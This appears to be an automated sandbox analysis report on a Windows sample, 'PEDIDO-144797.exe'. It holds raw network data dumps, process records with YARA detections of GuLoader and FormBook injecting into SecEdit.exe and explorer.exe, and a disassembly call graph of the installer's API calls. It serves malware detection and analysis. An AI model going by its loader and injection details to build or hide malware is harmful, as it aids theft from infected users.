                                                                                                                                        Data Ascii: iOsB&sJD^G QD&Pd}spVa"Z<~d7'TG;ZqqB0}zCbS@:yItNTDRP_6CQ9{J@ e]"yfW6;@xVW=q'U=2iNA2~>`D2;
                                                                                                                                        2024-10-04 08:50:45 UTC72INData Raw: 72 3f 75 eb b9 ba b4 ac 83 13 85 34 f5 be b1 e3 92 c9 66 e7 8d 38 0d 6c 5b 94 61 6c 04 55 fa 58 69 4e de 63 be b6 25 3c ff 0a a8 7f ae f4 dc f9 be fa f5 89 68 02 e6 cf 27 fa d1 92 34 0d ee a4 99 34 53 6e 82 5a 29 21
                                                                                                                                        Data Ascii: r?u4f8l[alUXiNc%<h'44SnZ)!
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: 18 47 34 21 92 61 63 2b 99 b0 65 48 f0 f6 06 32 9d 34 2d f6 0e b5 9c d9 7f a4 48 e9 aa 74 af 4e 22 bf 68 cd 8b 1b 2b 04 0e 3f 94 3f 29 19 5b 7c b7 24 0c 8b 9e 2f 0f fd db 6d b1 f8 e1 4e 88 cc 8d 6f b2 35 94 9e 39 13 d6 2f d7 48 3d 25 6b 0b 25 73 48 ba 98 b1 6d 57 68 4a a4 78 a4 d3 4b bf e6 79 77 4e fe 69 d2 51 4a 76 26 f8 71 ab f3 9d be e5 4c 87 6c 70 28 55 d3 a5 da 63 a4 8e f4 58 54 62 24 c4 30 f6 fd 80 c2 aa 22 23 39 2b 19 3c a6 a6 e7 28 11 a4 c9 6d 4f 92 eb 14 43 ad 53 5a 24 dc b7 57 91 5f 15 03 64 2c f1 a5 46 4e 1c 3d 7d 06 8a a2 9d 89 b1 93 35 12 94 f0 a5 10 ec a5 8f a8 2d 0b 95 6c 79 df 15 e7 5e 16 b7 7c a7 bd f1 3b c3 cf 61 9d 78 d5 95 0a 1d 5e 26 4d d1 53 8e 32 3d 13 04 eb d9 6f 15 6e 72 d6 b9 ec 87 e8 cf 41 04 02 91 ff 1b 37 3a 0c 2e 4e cc c2 9e
                                                                                                                                        Data Ascii: G4!ac+eH24-HtN"h+??)[|$/mNo59/H=%k%sHmWhJxKywNiQJv&qLlp(UcXTb$0"#9+<(mOCSZ$W_d,FN=}5-ly^|;ax^&MS2=onrA7:.N
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: a6 fa 14 e6 ec 00 5e bf de d8 b6 ca 60 c6 55 7b f6 91 0e 36 27 2b 01 7c 89 6f 5c ff d2 e5 19 de 8a da df 03 03 34 51 f8 fa f1 16 29 8e 3c 61 4b 0f 87 0b 0a ff c4 89 4b 77 53 27 2f 8f 2f 1e f3 d1 ae 65 09 a9 da 69 4d ed aa 57 0a e5 af f7 5b e2 04 c2 1c 21 21 92 20 23 95 ac e9 6a 07 0c 8c 3b 47 69 07 f5 3e f9 69 4b bd 2c 51 03 53 8d 76 30 77 43 e5 94 bf 37 fd a0 51 bc 95 d9 c7 a0 6f 6d f6 2a 9a 2c 46 34 a9 5e bc 56 f6 09 19 62 41 fe 4e 9b 97 09 29 6b 08 13 fe 44 b7 0d 3d d0 2a 8f b1 ab 40 e5 b5 15 e4 65 5d e9 b6 2e 0e a3 59 08 3d cf 78 f2 b8 89 b3 b0 12 cf 65 a4 d1 70 ab 4b 77 43 83 2a 70 82 f6 6a 6a d6 b4 23 7a 54 5c fc a6 7b 28 81 27 b8 61 7e c4 46 27 af f4 72 27 02 bf 14 18 39 89 3e 31 92 e6 d6 14 a3 da 3e 2a 9b 54 db 51 fb e4 7c 9f 9f 99 c3 c0 79 f0 4d
                                                                                                                                        Data Ascii: ^`U{6'+|o\4Q)<aKKwS'//eiMW[!! #j;Gi>iK,QSv0wC7Qom*,F4^VbAN)kD=*@e].Y=xepKwC*pjj#zT\{('a~F'r'9>1>*TQ|yM
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: c2 fe e3 07 14 63 1c 3b ec 4a 2a e5 4a 46 9e 60 a6 41 f0 bc 12 9b 46 b5 63 b2 2d d0 01 59 43 ae 35 11 52 ed a2 d8 0c 8b 09 5e 2f c1 db 0d 10 89 e1 6d 1b af b5 f3 eb cf 23 03 bf 10 45 f8 88 4d fd 45 ae bc 83 9b 7f 4d 86 61 dd 8c ab 23 ed d5 33 93 88 8b 06 a8 c4 c7 18 0f 8d 23 72 84 50 ed f9 de 67 93 85 33 a0 f7 f1 3e 4b e6 92 5d 8f 87 4b b0 16 3c 36 58 68 e6 b0 46 77 2e 4d 4e d8 1f 02 77 27 78 f4 29 69 f4 a6 44 b6 b3 06 5b fb a6 08 c7 14 ff b3 38 36 1f 38 4d d3 ac fd f0 4b 57 7c 1d 53 95 62 a6 8f 2d b1 dc 35 db ec 28 85 4a c2 a5 b0 dd 84 bf 48 bd c6 0c 6b cf 7b 75 48 f9 a0 cc b5 04 8d bc 5e 83 44 5e a0 72 c7 3f 97 f3 61 b4 a0 38 8f 58 57 e3 47 d3 ce 15 55 7f f4 f0 6a 8f e5 b9 8e a9 ec 1c a5 da 59 53 6b 75 ba 40 34 10 bd 4e aa bc 83 8c 15 fc 65 15 4c 4f 12
                                                                                                                                        Data Ascii: c;J*JF`AFc-YC5R^/m#EMEMa#3#rPg3>K]K<6XhFw.MNw'x)iD[868MKW|Sb-5(JHk{uH^D^r?a8XWGUjYSku@4NeLO
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: 04 27 b7 bd f3 38 a9 7d e2 4e 47 82 4b 12 81 70 e6 c9 73 f8 ed e9 c0 f9 5b dd 2c db e4 84 99 74 37 af cd 76 ed 6d d7 2d 76 33 4b 05 8c 52 9c 78 30 fd e8 ce 3d 84 b6 ce e9 43 74 cc 66 61 91 80 01 c1 a2 20 05 02 f6 77 df f1 73 f0 0a dd 05 34 1b c5 5b 9f f3 a1 83 78 91 07 5e e8 5a fb 9b 91 e0 be 30 ff 37 ba ab 19 7d 0d 7c 1c 93 85 f9 a4 2a f8 3a 16 4a c7 4e 23 bd 7f ac 4d d0 91 da 37 f7 0e 21 db 71 47 d4 52 7a 59 99 a9 68 62 e0 22 fa 85 ea ff 97 a0 0a fe 70 b7 b7 92 59 3c 68 82 b4 16 73 16 52 9e 52 78 d2 df df d9 0c 10 b4 1a 5d 67 f1 09 c6 3a 26 d5 98 7f cf 25 61 f4 ee 9c db ff 63 eb 45 b0 38 9e 1e d3 b0 b3 f6 d4 ad c4 8f 57 37 cf 42 a7 d8 38 45 23 c3 06 b8 16 3e 4d ca 76 a8 7c 99 70 5e c9 35 94 10 00 78 6d fc f4 87 57 73 af af 24 8f 4d d6 a0 7b 72 de b5 61
                                                                                                                                        Data Ascii: '8}NGKps[,t7vm-v3KRx0=Ctfa ws4[x^Z07}|*:JN#M7!qGRzYhb"pY<hsRRx]g:&%acE8W7B8E#>Mv|p^5xmWs$M{ra
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: c4 73 39 f4 18 df 63 19 ab 88 b2 df 80 72 5e 06 14 b9 ec 6b e9 93 45 8b ae 0f 77 7c 86 d5 31 1a 55 e0 ed ba 13 fc f4 c9 99 d6 12 1d ef 34 b2 c4 3d fa 80 c7 ab 2c 6f 15 1a 68 b6 ea ce 77 40 01 84 c6 c2 ae 6d 20 bd b7 fc 3b a0 ab 36 f3 c5 43 04 bb b1 6f 1e 53 76 ff 58 97 6c b6 64 6f 84 49 4e 50 b6 a4 1c f4 29 25 a0 38 fb e2 ad 96 9a 90 54 50 37 4c a7 44 6b 0c 7f 99 8a 5c c7 59 1b 21 ba cb f6 4f bf 8d 4c 8a f3 4a 88 c6 0b 0b eb 16 36 98 83 72 28 8f 6d 33 7e d2 ea 92 0a 51 13 da fd fe cc 29 60 89 05 fe 25 81 61 0c 49 ea 82 b0 6d ca 96 d8 49 2a f1 fa 3a 19 73 c1 33 85 4a af b4 0f a5 01 89 cf 20 c6 ec 08 85 4f 82 5b 44 b6 08 48 5c e1 62 cc 85 99 44 9a 84 79 83 83 36 79 39 4d 51 f9 09 d2 50 aa dd 63 96 3a 09 d3 7b 29 9f 8b 3c 96 eb af 48 c4 30 c0 89 6a c1 dd 74
                                                                                                                                        Data Ascii: s9cr^kEw|1U4=,ohw@m ;6CoSvXldoINP)%8TP7LDk\Y!OLJ6r(m3~Q)`%aImI*:s3J O[DH\bDy6y9MQPc:{)<H0jt
                                                                                                                                        2024-10-04 08:50:45 UTC1255INData Raw: c4 d6 ee a6 1e de 25 28 cd ae af 9a 59 ff dd db fe c0 ee bc 4e df be 29 56 d8 c3 78 70 0f 7a 65 28 2d 7d 42 f8 ee 9d 67 f5 3c 1a 62 67 bc ea 6b 85 b2 1e 61 cb 45 99 a8 ff c7 c7 13 d5 73 9a 75 27 56 f6 9a e5 6b 70 03 22 e1 20 c8 f6 5b 59 be 75 07 f6 ff b7 6f aa 19 1e 9a 70 3c f4 af 8a 53 9c 20 3f 08 4f fe 06 8c 37 83 a7 f1 e7 d2 f3 ff f0 59 47 c0 d8 ae 63 3f 23 88 d3 53 7a 94 e2 ac 83 63 c8 44 1f 57 bd 60 af d6 2c 2b 38 34 27 38 ce c9 62 d6 a5 ed 37 ec e3 fe fb 6c f8 72 51 72 f4 b3 92 30 08 70 ad c1 ad 26 b9 74 0c 5c 1c a2 fa 8c ad f2 ab bf d3 2c 0e 08 33 f0 3f b6 ce 4b 22 3a 40 d4 9a ed 92 18 7a 2e 9b 21 d7 f4 df 96 31 42 28 ee c1 35 fa 66 f8 46 7d 98 9a 6b 1a f1 bf 8c 0d 26 d3 f9 9c 0e d8 43 57 6f 35 7d 0b f0 ff d0 0c e2 06 57 c8 95 7e 26 96 d1 50 e8 42
                                                                                                                                        Data Ascii: %(YN)Vxpze(-}Bg<bgkaEsu'Vkp" [Yuop<S ?O7YGc?#SzcDW`,+84'8b7lrQr0p&t\,3?K":@z.!1B(5fF}k&CWo5}W~&PB


                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:04:50:11
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\PEDIDO-144797.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:567'544 bytes
                                                                                                                                        MD5 hash:2C5483106FE248CCED82541B91CBA20E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.89703248997.000000000340F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:2
                                                                                                                                        Start time:04:50:36
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Users\user\Desktop\PEDIDO-144797.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Users\user\Desktop\PEDIDO-144797.exe"
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:567'544 bytes
                                                                                                                                        MD5 hash:2C5483106FE248CCED82541B91CBA20E
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.90098184931.00000000323D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:low
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:3
                                                                                                                                        Start time:04:51:17
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                        Imagebase:0x140000000
                                                                                                                                        File size:16'696'840 bytes
                                                                                                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        General

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:04:51:17
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Windows\SysWOW64\SecEdit.exe"
                                                                                                                                        Imagebase:0x670000
                                                                                                                                        File size:37'888 bytes
                                                                                                                                        MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.91632908078.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.91633128931.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        General

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:04:53:51
                                                                                                                                        Start date:04/10/2024
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                        Imagebase:0x7ff6c98f0000
                                                                                                                                        File size:4'849'904 bytes
                                                                                                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        Disassembly

                                                                                                                                        Reset < >

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:17.3%
                                                                                                                                          Dynamic/Decrypted Code Coverage:13.2%
                                                                                                                                          Signature Coverage:19.2%
                                                                                                                                          Total number of Nodes:1590
                                                                                                                                          Total number of Limit Nodes:37
                                                                                                                                          execution_graph 5086 10001000 5089 1000101b 5086->5089 5096 10001516 5089->5096 5091 10001020 5092 10001024 5091->5092 5093 10001027 GlobalAlloc 5091->5093 5094 1000153d 3 API calls 5092->5094 5093->5092 5095 10001019 5094->5095 5098 1000151c 5096->5098 5097 10001522 5097->5091 5098->5097 5099 1000152e GlobalFree 5098->5099 5099->5091 4198 401941 4199 401943 4198->4199 4200 402c37 17 API calls 4199->4200 4201 401948 4200->4201 4204 405abe 4201->4204 4243 405d89 4204->4243 4207 405ae6 DeleteFileW 4209 401951 4207->4209 4208 405afd 4211 405c28 4208->4211 4257 4063b0 lstrcpynW 4208->4257 4211->4209 4275 4066f3 FindFirstFileW 4211->4275 4212 405b23 4213 405b36 4212->4213 4214 405b29 lstrcatW 4212->4214 4258 405ccd lstrlenW 4213->4258 4215 405b3c 4214->4215 4218 405b4c lstrcatW 4215->4218 4220 405b57 lstrlenW FindFirstFileW 4215->4220 4218->4220 4222 405c1d 4220->4222 4241 405b79 4220->4241 4221 405c46 4278 405c81 lstrlenW CharPrevW 4221->4278 4222->4211 4225 405c00 FindNextFileW 4228 405c16 FindClose 4225->4228 4225->4241 4226 405a76 5 API calls 4229 405c58 4226->4229 4228->4222 4230 405c72 4229->4230 4231 405c5c 4229->4231 4233 405414 24 API calls 4230->4233 4231->4209 4234 405414 24 API calls 4231->4234 4233->4209 4236 405c69 4234->4236 4235 405abe 60 API calls 4235->4241 4237 406176 36 API calls 4236->4237 4239 405c70 4237->4239 4238 405414 24 API calls 4238->4225 4239->4209 4240 405414 24 API calls 4240->4241 4241->4225 4241->4235 4241->4238 4241->4240 4262 4063b0 lstrcpynW 4241->4262 4263 405a76 4241->4263 4271 406176 MoveFileExW 4241->4271 4281 4063b0 lstrcpynW 4243->4281 4245 405d9a 4282 405d2c CharNextW CharNextW 4245->4282 4248 405ade 4248->4207 4248->4208 4249 406644 5 API calls 4254 405db0 4249->4254 4250 405de1 lstrlenW 4251 405dec 4250->4251 4250->4254 4253 405c81 3 API calls 4251->4253 4252 4066f3 2 API calls 4252->4254 4255 405df1 GetFileAttributesW 4253->4255 4254->4248 4254->4250 4254->4252 4256 405ccd 2 API calls 4254->4256 4255->4248 4256->4250 4257->4212 4259 405cdb 4258->4259 4260 405ce1 CharPrevW 4259->4260 4261 405ced 4259->4261 4260->4259 4260->4261 4261->4215 4262->4241 4288 405e7d GetFileAttributesW 4263->4288 4266 405aa3 4266->4241 4267 405a91 RemoveDirectoryW 4269 405a9f 4267->4269 4268 405a99 DeleteFileW 4268->4269 4269->4266 4270 405aaf SetFileAttributesW 4269->4270 4270->4266 4272 406197 4271->4272 4273 40618a 4271->4273 4272->4241 4291 405ffc 4273->4291 4276 405c42 4275->4276 4277 406709 FindClose 4275->4277 4276->4209 4276->4221 4277->4276 4279 405c4c 4278->4279 4280 405c9d lstrcatW 4278->4280 4279->4226 4280->4279 4281->4245 4283 405d49 4282->4283 4286 405d5b 4282->4286 4285 405d56 CharNextW 4283->4285 4283->4286 4284 405d7f 4284->4248 4284->4249 4285->4284 4286->4284 4287 405cae CharNextW 4286->4287 4287->4286 4289 405a82 4288->4289 4290 405e8f SetFileAttributesW 4288->4290 4289->4266 4289->4267 4289->4268 4290->4289 4292 406052 GetShortPathNameW 4291->4292 4293 40602c 4291->4293 4294 406171 4292->4294 4295 406067 4292->4295 4318 405ea2 GetFileAttributesW CreateFileW 4293->4318 4294->4272 4295->4294 4297 40606f wsprintfA 4295->4297 4299 4063d2 17 API calls 4297->4299 4298 406036 CloseHandle GetShortPathNameW 4298->4294 4300 40604a 4298->4300 4301 406097 4299->4301 4300->4292 4300->4294 4319 405ea2 GetFileAttributesW CreateFileW 4301->4319 4303 4060a4 4303->4294 4304 4060b3 GetFileSize GlobalAlloc 4303->4304 4305 4060d5 4304->4305 4306 40616a CloseHandle 4304->4306 4320 405f25 ReadFile 4305->4320 4306->4294 4311 4060f4 lstrcpyA 4314 406116 4311->4314 4312 406108 4313 405e07 4 API calls 4312->4313 4313->4314 4315 40614d SetFilePointer 4314->4315 4327 405f54 WriteFile 4315->4327 4318->4298 4319->4303 4321 405f43 4320->4321 4321->4306 4322 405e07 lstrlenA 4321->4322 4323 405e48 lstrlenA 4322->4323 4324 405e50 4323->4324 4325 405e21 lstrcmpiA 4323->4325 4324->4311 4324->4312 4325->4324 4326 405e3f CharNextA 4325->4326 4326->4323 4328 405f72 GlobalFree 4327->4328 4328->4306 4329 4015c1 4330 402c37 17 API calls 4329->4330 4331 4015c8 4330->4331 4332 405d2c 4 API calls 4331->4332 4344 4015d1 4332->4344 4333 401631 4335 401663 4333->4335 4336 401636 4333->4336 4334 405cae CharNextW 4334->4344 4339 401423 24 API calls 4335->4339 4356 401423 4336->4356 4346 40165b 4339->4346 4343 40164a SetCurrentDirectoryW 4343->4346 4344->4333 4344->4334 4345 401617 GetFileAttributesW 4344->4345 4348 40597d 4344->4348 4351 4058e3 CreateDirectoryW 4344->4351 4360 405960 CreateDirectoryW 4344->4360 4345->4344 4363 40678a GetModuleHandleA 4348->4363 4352 405930 4351->4352 4353 405934 GetLastError 4351->4353 4352->4344 4353->4352 4354 405943 SetFileSecurityW 4353->4354 4354->4352 4355 405959 GetLastError 4354->4355 4355->4352 4357 405414 24 API calls 4356->4357 4358 401431 4357->4358 4359 4063b0 lstrcpynW 4358->4359 4359->4343 4361 405970 4360->4361 4362 405974 GetLastError 4360->4362 4361->4344 4362->4361 4364 4067b0 GetProcAddress 4363->4364 4365 4067a6 4363->4365 4367 405984 4364->4367 4369 40671a GetSystemDirectoryW 4365->4369 4367->4344 4368 4067ac 4368->4364 4368->4367 4370 40673c wsprintfW LoadLibraryExW 4369->4370 4370->4368 4375 401e43 4383 402c15 4375->4383 4377 401e49 4378 402c15 17 API calls 4377->4378 4379 401e55 4378->4379 4380 401e61 ShowWindow 4379->4380 4381 401e6c EnableWindow 4379->4381 4382 402abf 4380->4382 4381->4382 4384 4063d2 17 API calls 4383->4384 4385 402c2a 4384->4385 4385->4377 4390 402644 4391 402c15 17 API calls 4390->4391 4400 402653 4391->4400 4392 402790 4393 40269d ReadFile 4393->4392 4393->4400 4394 402736 4394->4392 4394->4400 4404 405f83 SetFilePointer 4394->4404 4395 405f25 ReadFile 4395->4400 4397 402792 4413 4062f7 wsprintfW 4397->4413 4398 4026dd MultiByteToWideChar 4398->4400 4400->4392 4400->4393 4400->4394 4400->4395 4400->4397 4400->4398 4401 402703 SetFilePointer MultiByteToWideChar 4400->4401 4402 4027a3 4400->4402 4401->4400 4402->4392 4403 4027c4 SetFilePointer 4402->4403 4403->4392 4405 405f9f 4404->4405 4412 405fbb 4404->4412 4406 405f25 ReadFile 4405->4406 4407 405fab 4406->4407 4408 405fc4 SetFilePointer 4407->4408 4409 405fec SetFilePointer 4407->4409 4407->4412 4408->4409 4410 405fcf 4408->4410 4409->4412 4411 405f54 WriteFile 4410->4411 4411->4412 4412->4394 4413->4392 5107 402348 5108 402c37 17 API calls 5107->5108 5109 402357 5108->5109 5110 402c37 17 API calls 5109->5110 5111 402360 5110->5111 5112 402c37 17 API calls 5111->5112 5113 40236a GetPrivateProfileStringW 5112->5113 5117 4016cc 5118 402c37 17 API calls 5117->5118 5119 4016d2 GetFullPathNameW 5118->5119 5120 4016ec 5119->5120 5126 40170e 5119->5126 5122 4066f3 2 API calls 5120->5122 5120->5126 5121 401723 GetShortPathNameW 5123 402abf 5121->5123 5124 4016fe 5122->5124 5124->5126 5127 4063b0 lstrcpynW 5124->5127 5126->5121 5126->5123 5127->5126 5128 401b4d 5129 402c37 17 API calls 5128->5129 5130 401b54 5129->5130 5131 402c15 17 API calls 5130->5131 5132 401b5d wsprintfW 5131->5132 5133 402abf 5132->5133 5134 4047cd 5135 404803 5134->5135 5136 4047dd 5134->5136 5144 4043ac 5135->5144 5141 404345 5136->5141 5140 4047ea SetDlgItemTextW 5140->5135 5142 4063d2 17 API calls 5141->5142 5143 404350 SetDlgItemTextW 5142->5143 5143->5140 5145 4043c4 GetWindowLongW 5144->5145 5155 40444d 5144->5155 5146 4043d5 5145->5146 5145->5155 5147 4043e4 GetSysColor 5146->5147 5148 4043e7 5146->5148 5147->5148 5149 4043f7 SetBkMode 5148->5149 5150 4043ed SetTextColor 5148->5150 5151 404415 5149->5151 5152 40440f GetSysColor 5149->5152 5150->5149 5153 404426 5151->5153 5154 40441c SetBkColor 5151->5154 5152->5151 5153->5155 5156 404440 CreateBrushIndirect 5153->5156 5157 404439 DeleteObject 5153->5157 5154->5153 5156->5155 5157->5156 5158 401f52 5159 402c37 17 API calls 5158->5159 5160 401f59 5159->5160 5161 4066f3 2 API calls 5160->5161 5162 401f5f 5161->5162 5164 401f70 5162->5164 5165 4062f7 wsprintfW 5162->5165 5165->5164 5166 402253 5167 402c37 17 API calls 5166->5167 5168 402259 5167->5168 5169 402c37 17 API calls 5168->5169 5170 402262 5169->5170 5171 402c37 17 API calls 5170->5171 5172 40226b 5171->5172 5173 4066f3 2 API calls 5172->5173 5174 402274 5173->5174 5175 402285 lstrlenW lstrlenW 5174->5175 5176 402278 5174->5176 5178 405414 24 API calls 5175->5178 5177 405414 24 API calls 5176->5177 5180 402280 5177->5180 5179 4022c3 SHFileOperationW 5178->5179 5179->5176 5179->5180 5181 405553 5182 405574 GetDlgItem GetDlgItem GetDlgItem 5181->5182 5183 4056fd 5181->5183 5226 40437a SendMessageW 5182->5226 5185 405706 GetDlgItem CreateThread CloseHandle 5183->5185 5186 40572e 5183->5186 5185->5186 5188 405759 5186->5188 5189 405745 ShowWindow ShowWindow 5186->5189 5190 40577e 5186->5190 5187 4055e4 5192 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 5187->5192 5191 4057b9 5188->5191 5194 405793 ShowWindow 5188->5194 5195 40576d 5188->5195 5228 40437a SendMessageW 5189->5228 5196 4043ac 8 API calls 5190->5196 5191->5190 5201 4057c7 SendMessageW 5191->5201 5199 405659 5192->5199 5200 40563d SendMessageW SendMessageW 5192->5200 5197 4057b3 5194->5197 5198 4057a5 5194->5198 5229 40431e 5195->5229 5203 40578c 5196->5203 5205 40431e SendMessageW 5197->5205 5204 405414 24 API calls 5198->5204 5206 40566c 5199->5206 5207 40565e SendMessageW 5199->5207 5200->5199 5201->5203 5208 4057e0 CreatePopupMenu 5201->5208 5204->5197 5205->5191 5210 404345 18 API calls 5206->5210 5207->5206 5209 4063d2 17 API calls 5208->5209 5211 4057f0 AppendMenuW 5209->5211 5212 40567c 5210->5212 5213 405820 TrackPopupMenu 5211->5213 5214 40580d GetWindowRect 5211->5214 5215 405685 ShowWindow 5212->5215 5216 4056b9 GetDlgItem SendMessageW 5212->5216 5213->5203 5218 40583b 5213->5218 5214->5213 5219 4056a8 5215->5219 5220 40569b ShowWindow 5215->5220 5216->5203 5217 4056e0 SendMessageW SendMessageW 5216->5217 5217->5203 5221 405857 SendMessageW 5218->5221 5227 40437a SendMessageW 5219->5227 5220->5219 5221->5221 5222 405874 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5221->5222 5224 405899 SendMessageW 5222->5224 5224->5224 5225 4058c2 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5203 5226->5187 5227->5216 5228->5188 5230 404325 5229->5230 5231 40432b SendMessageW 5229->5231 5230->5231 5231->5190 5232 401956 5233 402c37 17 API calls 5232->5233 5234 40195d lstrlenW 5233->5234 5235 40258c 5234->5235 5038 4014d7 5039 402c15 17 API calls 5038->5039 5040 4014dd Sleep 5039->5040 5042 402abf 5040->5042 5236 401d57 GetDlgItem GetClientRect 5237 402c37 17 API calls 5236->5237 5238 401d89 LoadImageW SendMessageW 5237->5238 5239 401da7 DeleteObject 5238->5239 5240 402abf 5238->5240 5239->5240 5241 4022d7 5242 4022f1 5241->5242 5243 4022de 5241->5243 5244 4063d2 17 API calls 5243->5244 5245 4022eb 5244->5245 5246 405a12 MessageBoxIndirectW 5245->5246 5246->5242 5247 402dd7 5248 402e02 5247->5248 5249 402de9 SetTimer 5247->5249 5250 402e50 5248->5250 5251 402e56 MulDiv 5248->5251 5249->5248 5252 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 5251->5252 5252->5250 5254 404459 lstrcpynW lstrlenW 5043 40175c 5044 402c37 17 API calls 5043->5044 5045 401763 5044->5045 5046 405ed1 2 API calls 5045->5046 5047 40176a 5046->5047 5048 405ed1 2 API calls 5047->5048 5048->5047 5061 4023de 5062 402c37 17 API calls 5061->5062 5063 4023f0 5062->5063 5064 402c37 17 API calls 5063->5064 5065 4023fa 5064->5065 5078 402cc7 5065->5078 5068 402432 5071 402c15 17 API calls 5068->5071 5073 40243e 5068->5073 5069 402885 5070 402c37 17 API calls 5074 402428 lstrlenW 5070->5074 5071->5073 5072 40245d RegSetValueExW 5076 402473 RegCloseKey 5072->5076 5073->5072 5075 4031ba 44 API calls 5073->5075 5074->5068 5075->5072 5076->5069 5079 402ce2 5078->5079 5082 40624b 5079->5082 5083 40625a 5082->5083 5084 40240a 5083->5084 5085 406265 RegCreateKeyExW 5083->5085 5084->5068 5084->5069 5084->5070 5085->5084 5262 402862 5263 402c37 17 API calls 5262->5263 5264 402869 FindFirstFileW 5263->5264 5265 402891 5264->5265 5269 40287c 5264->5269 5270 4062f7 wsprintfW 5265->5270 5267 40289a 5271 4063b0 lstrcpynW 5267->5271 5270->5267 5271->5269 5272 4044e2 5273 4044fa 5272->5273 5280 404614 5272->5280 5277 404345 18 API calls 5273->5277 5274 40467e 5275 404748 5274->5275 5276 404688 GetDlgItem 5274->5276 5282 4043ac 8 API calls 5275->5282 5278 4046a2 5276->5278 5279 404709 5276->5279 5281 404561 5277->5281 5278->5279 5286 4046c8 SendMessageW LoadCursorW SetCursor 5278->5286 5279->5275 5287 40471b 5279->5287 5280->5274 5280->5275 5283 40464f GetDlgItem SendMessageW 5280->5283 5285 404345 18 API calls 5281->5285 5296 404743 5282->5296 5305 404367 EnableWindow 5283->5305 5289 40456e CheckDlgButton 5285->5289 5309 404791 5286->5309 5291 404731 5287->5291 5292 404721 SendMessageW 5287->5292 5288 404679 5306 40476d 5288->5306 5303 404367 EnableWindow 5289->5303 5291->5296 5297 404737 SendMessageW 5291->5297 5292->5291 5297->5296 5298 40458c GetDlgItem 5304 40437a SendMessageW 5298->5304 5300 4045a2 SendMessageW 5301 4045c8 SendMessageW SendMessageW lstrlenW 